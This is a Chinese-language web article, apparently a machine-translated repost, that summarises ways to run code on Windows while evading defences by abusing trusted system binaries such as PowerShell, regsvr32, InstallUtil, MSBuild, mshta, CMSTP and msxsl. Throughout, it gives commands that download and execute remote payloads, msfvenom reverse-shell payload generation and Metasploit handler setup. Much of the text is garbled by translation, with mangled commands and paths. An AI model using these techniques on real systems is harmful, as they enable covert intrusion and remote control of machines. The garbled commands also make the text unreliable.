今天小編為大家?guī)鞼indows命令執(zhí)行防御規(guī)避總結(jié), 具體如下: powershell powershell.exe-nop-w隱藏-c”IEX。downloadstring(' http://xx . xx . xx . xx:8888/logo . gif ')\ "/f 啜飲 通過sip劫持從惡意代碼簽名中獲得系統(tǒng)信任的Https://github.com/secretsquirrel/SigThief consent.exe-mimikatz.exe-signed-mimikatz.exe rundll32.exe 產(chǎn)生 xxx.dll 目標(biāo)執(zhí)行 rundll32.exe外殼32.dll,xxx.dll控件 Regsvr32.exe msfconsole 輔助/服務(wù)器/regsvr 32 _ command _ delivery _ server 設(shè)置CMD網(wǎng)絡(luò)用戶測(cè)試123456 /add 目標(biāo)執(zhí)行 regsvr 32/s/n/u/I:http://xx . xx . xx . xx:8080/APxob0o scrobj.dll InstallUtil.exe 1.編譯后門: c:\ Windows \微軟。csc.exe/r:系統(tǒng)。EnterpriseServices.dll/不安全/目標(biāo):庫/輸出:XXX . exe/key file:“C:\ Program Files(x86)\ Microsoft SDKs \ Windows \ v 10.0a \ bin \ NETFX 4.8 Tools \ x64 \ key . snk”XXX . cs 2.在無人機(jī)上運(yùn)行: InstallUtil.exe/xxx.exe大學(xué) 3.msf監(jiān)控并獲取彈殼: 設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp 設(shè)置LHOST xx.xx.xx.xx 設(shè)置LPORT 4444 剝削 Msbuild.exe MSBuild是微軟Build Engine的縮寫,代表了微軟和Visual Studio的新一代平臺(tái)。MSBuild可以編譯特定格式的xml文件。 https://github.com/3gstudent/msbuild-inline-task Msf生成外殼代碼 msfvene-p windows/x64/meter preter/reverse _ TCP lhost = xx . xx . xx . xx lport = 4444 f-csharp 使用shellcode替換https://github.com/3g學(xué)生/msbuild-inline-task/blob/master/executes % 20x 64% 20 shellcode . XML中的shellcode部分。 Msf監(jiān)控 使用利用/多重/處理程序 設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp 設(shè)置lhost xx.xx.xx.xx 設(shè)置lport 4444 剝削 奔跑 c:\ Windows \微軟。. NET \ Framework \ v 4 . 0 . 30319 \ MsBuild . exe exec 64 . XML CMSTP Cmstp.exe/s/ns c:\ users \ administrator \ appdata \ local \ temp \ xknqbpzl . txt繞過AppLocker并啟動(dòng)惡意腳本。 Mshta.exe Mshta.exe是一個(gè)執(zhí)行微軟HTML應(yīng)用程序的實(shí)用程序(HTA)。攻擊者可以使用mshta.exe通過受信任的Windows實(shí)用程序代理執(zhí)行惡意代碼。 使用漏洞/windows/misc/hta_server msf漏洞利用(windows/misc/hta_server)】設(shè)置srvhost xx.xx.xx.xx msf漏洞利用(windows/misc/hta_server)】漏洞利用 mshta.exe·http://xx.xx.xx.xx:8080/xxxxxxx.hta 控制面板 攻擊者可以使用控制面板項(xiàng)目作為有效負(fù)載來執(zhí)行任意命令?刂泼姘屙(xiàng)目是注冊(cè)的可執(zhí)行文件(。exe)或控制面板(。cpl)文件,可以直接從命令行執(zhí)行,也可以通過Control_RunDLL(API)調(diào)用,或者直接雙擊。 攻擊者構(gòu)建惡意dll文件CPIApplet.dll。 用msf生成dll文件: msfvene-p windows/x64/meter preter/reverse _ TCP LHOST = 170 . 170 . 64 . 17 LPORT = 4444-f dll ”/ tmp/CPIapplet . dll 將其傳遞到windows機(jī)器中,然后將其重命名為CPIApplet.cpl,并通過control.exe c:\ user \ administrator \ desktop \ CPI applet . CPL執(zhí)行該命令。 msxsl.exe通過調(diào)用惡意xml文件來執(zhí)行腳本 制作兩個(gè)文件。 customers.xml script.xsl http://www.w3.org/1999/XSL/Transform" xmlns:msxsl = " urn:schemas-Microsoft-com:XSLT " 用戶=“http://mycompany.com/mynamespace"》 函數(shù)xml(節(jié)點(diǎn)列表){ 0 var r = new ActiveXObject("WScript。外殼”)。run(" cmd.exe/k calc . exe "); 返回nodelist.nextNode()。xml } 打開http服務(wù) python3 -m http.server 80 遠(yuǎn)程下載執(zhí)行 msxsl.exe·http://xx.xx.xx.xx/customers.xml·http://xx.xx.xx.xx/scrip.xsl
|
正在閱讀:Windows命令執(zhí)行防御規(guī)避總結(jié)Windows命令執(zhí)行防御規(guī)避總結(jié)
2022-01-04 16:01
出處:其他
作者:佚名
責(zé)任編輯:yuhaohui
